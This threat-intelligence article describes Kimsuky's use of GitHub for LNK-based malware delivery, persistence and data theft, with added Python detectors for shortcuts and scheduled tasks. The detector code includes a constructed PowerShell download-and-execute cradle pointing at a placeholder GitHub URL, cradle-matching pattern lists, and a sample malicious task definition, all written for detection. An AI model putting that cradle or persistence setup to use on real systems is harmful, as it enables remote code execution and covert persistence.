
Kimsuky Hackers Exploit Weaponized LNK Files on GitHub for Malware Distribution

The North Korea-backed APT group Kimsuky has moved its malware delivery and data exfiltration onto GitHub repositories. Using a legitimate cloud service as command-and-control infrastructure lets the traffic blend in with ordinary developer activity, which helps the group get past traditional network controls while keeping persistent access to compromised systems.

The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk); the double extension hides the shortcut behind a PDF name. When the shortcut is opened, it launches a PowerShell command that downloads and runs additional scripts from attacker-controlled GitHub repositories. This initial payload lays the groundwork for systematic data collection and long-term persistence on the infected host. S2W researchers identified nine private GitHub repositories linked to the campaign, including Group_0717, Group_0721, Test, Hometax, and Group_0803. The PowerShell scripts authenticate to these private repositories with a hardcoded GitHub personal access token. That choice is a weak point in the tradecraft rather than a strength: whoever recovers a dropped script also recovers the token, and with it read access to the repositories the campaign depends on until the token is revoked.
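The lure is a double-extension shortcut whose command line pulls the next stage from GitHub, so an archive scanner can catch it before anyone double-clicks. The Python below is an added example, not code from the article or from S2W: it parses .lnk entries inside a ZIP (the ShellLinkHeader, skipping the optional IDList and LinkInfo, then the StringData fields) and scores each on the indicators described above. The ZIP, the shortcut and the URL inside it are constructed for the demo; the repository URL is a placeholder, not a real indicator.

```python
"""Triage .lnk entries inside a ZIP for the pattern above: a double-extension
shortcut whose command line runs a PowerShell download cradle.
Added example, not code from the article or from S2W; the ZIP, the shortcut and
the GitHub URL are constructed for the demo (the URL is a placeholder)."""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# Command-line indicators of a download cradle (matched case-insensitively).
CRADLE_PATTERNS = [
    r"powershell|pwsh", r"-w(indowstyle)?\s+h(idden)?", r"-e(xecutionpolicy|p)\s+bypass",
    r"DownloadString|DownloadFile", r"Invoke-WebRequest|\biwr\b", r"\bIEX\b|Invoke-Expression",
    r"raw\.githubusercontent\.com|api\.github\.com",
]
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp|txt)$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Parse a Shell Link (MS-SHLLINK): header, skip IDList/LinkInfo, read StringData."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:                      # LinkTargetIDList: uint16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # LinkInfo: uint32 total size, self-inclusive
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                       (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def triage_zip(zip_bytes: bytes) -> list:
    """Return one finding per .lnk entry: double-extension check plus cradle indicators."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            double_ext = bool(DOUBLE_EXT.search(info.filename[:-4]))
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError:
                continue
            cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
            hits = [p for p in CRADLE_PATTERNS if re.search(p, cmdline, re.I)]
            findings.append({"entry": info.filename, "double_extension": double_ext,
                             "indicators": hits, "command_line": cmdline,
                             "verdict": "suspicious" if double_ext and len(hits) >= 3 else "review"})
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed shortcut for the demo: no IDList/LinkInfo, Unicode strings only."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + b"\0" * (0x4C - 24)
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(arguments)


def build_sample_zip() -> bytes:
    """Constructed ZIP mimicking the lure; the GitHub URL is a placeholder, not an IOC."""
    args = ('-w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('
            "'https://raw.githubusercontent.com/example-org/example-repo/main/main.ps1')\"")
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", args)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("전자세금계산서.pdf.lnk", lnk)
        zf.writestr("README.txt", "benign file, not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["verdict"], finding["entry"], finding["indicators"])
```

The parser only reads StringData; many real shortcuts carry the target in the IDList and the cradle in the arguments, and some hide it in extra data blocks, so in production pair this with a full LNK parser and treat any shortcut inside an archive as worth a look.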

Persistence is handled by a scheduled task. On first run, main.ps1 writes a file named MicrosoftEdgeUpdate.ps1 to the %AppData% directory and registers a task titled “BitLocker MDM Policy RefreshDBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00”; both names imitate legitimate Windows components. The task first fires five minutes after registration and then every 30 minutes, each time fetching and executing the latest PowerShell script from the GitHub repository, so the operators can change the payload on every infected host without touching it again.

The repository also doubles as a tracking system. The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings in it with a timestamp-based identifier (ntxBill_MMdd_HHmm), and uploads the modified script back under a filename derived from that timestamp. Each infection therefore gets its own script and folder in the repository, which lets the attackers tell infections apart and manage many compromised systems at once.

The information-stealing component gathers extensive system metadata: IP addresses, boot time, operating-system details, hardware specifications, device type, installation date, and the list of running processes. The collected data is written to log files and uploaded to the attackers’ repository under timestamped folders, giving the operators an organised database of their victims.
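Because the persistence lives in a scheduled task, the task definition is the artefact to hunt. The Python below is an added example, not code from the article or from S2W: it parses Task Scheduler XML (what `schtasks /query /xml` exports, or the files under C:\Windows\System32\Tasks) and flags tasks that run a script host on a payload in a user-writable path at a short repetition interval. Both task definitions are constructed for the demo, and the assumption that the five-minute delay shows up as a StartBoundary five minutes after the registration Date is mine, not a detail from the article.

```python
"""Hunt Task Scheduler XML for the persistence pattern above: a task that
launches PowerShell on a script in %AppData% at a short repetition interval.
Added example, not code from the article or from S2W. Both task definitions are
constructed; on-disk task files start with a UTF-16 XML declaration, omitted here."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOST = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)(\.exe)?$", re.I)
USER_WRITABLE = re.compile(r"%(local)?appdata%|%temp%|\\appdata\\|\\users\\public\\|\\programdata\\", re.I)
EVASION = re.compile(r"-w(indowstyle)?\s+h(idden)?|-e(xecutionpolicy|p)\s+bypass|-nop\b", re.I)
BEACON_MAX_MIN = 60   # repetition faster than this is treated as beaconing


def iso_duration_minutes(value):
    """Convert a Task Scheduler ISO 8601 duration (PT30M, P1DT2H) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return float("inf")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def triage_task(task_xml: str) -> dict:
    """Score one task definition; 'reasons' lists every matched indicator."""
    root = ET.fromstring(task_xml)
    text = lambda path: root.findtext(path, default="", namespaces=NS)
    reasons = []
    interval = min((iso_duration_minutes(e.text) for e in root.iterfind(".//t:Repetition/t:Interval", NS)),
                   default=float("inf"))
    if interval < BEACON_MAX_MIN:
        reasons.append(f"repeats every {interval:g} min")
    # Assumption: the initial delay is StartBoundary minus the registration Date.
    reg, start = text("t:RegistrationInfo/t:Date"), text(".//t:TimeTrigger/t:StartBoundary")
    delay = ((datetime.fromisoformat(start) - datetime.fromisoformat(reg)).total_seconds() / 60
             if reg and start else None)
    for exe in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS)
        args = exe.findtext("t:Arguments", default="", namespaces=NS)
        if SCRIPT_HOST.search(cmd):
            reasons.append(f"script host: {cmd}")
        if USER_WRITABLE.search(cmd + " " + args):
            reasons.append("payload in user-writable path")
        if EVASION.search(args):
            reasons.append("hidden window / policy bypass")
    return {"task": text("t:RegistrationInfo/t:URI"), "interval_min": interval,
            "first_run_delay_min": delay, "reasons": reasons, "suspicious": len(reasons) >= 3}


# Constructed: the task described in the article, as Task Scheduler would export it.
MALICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2025-08-03T09:00:00</Date>
    <URI>\BitLocker MDM Policy RefreshDBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00</URI>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2025-08-03T09:05:00</StartBoundary>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -File %AppData%\MicrosoftEdgeUpdate.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: a benign updater task with a similar-looking name, to show the rule does not fire on it.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2025-08-03T09:00:00</Date><URI>\MicrosoftEdgeUpdateTaskMachineUA</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2025-08-03T09:00:00</StartBoundary>
      <Repetition><Interval>PT1H</Interval></Repetition>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for doc in (MALICIOUS_TASK, BENIGN_TASK):
        r = triage_task(doc)
        print("SUSPICIOUS" if r["suspicious"] else "ok", r["task"], r["reasons"])
```

On a live host, feed it the output of `schtasks /query /xml /tn <name>` or the task files themselves; on an image, walk C:\Windows\System32\Tasks. The name check is deliberately absent: the task name is trivial for the operators to change, while a script host, a user-writable payload path and a sub-hour repetition are the properties the technique needs.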

Categories: Cyber Operations, Malware Delivery, Data Exfiltration 

Tags: Kimsuky, Cyber Operations, GitHub Repositories, Malware Delivery, Data Exfiltration, PowerShell, Persistence Mechanism, Dynamic Script Management, Information Gathering, Threat Intelligence 
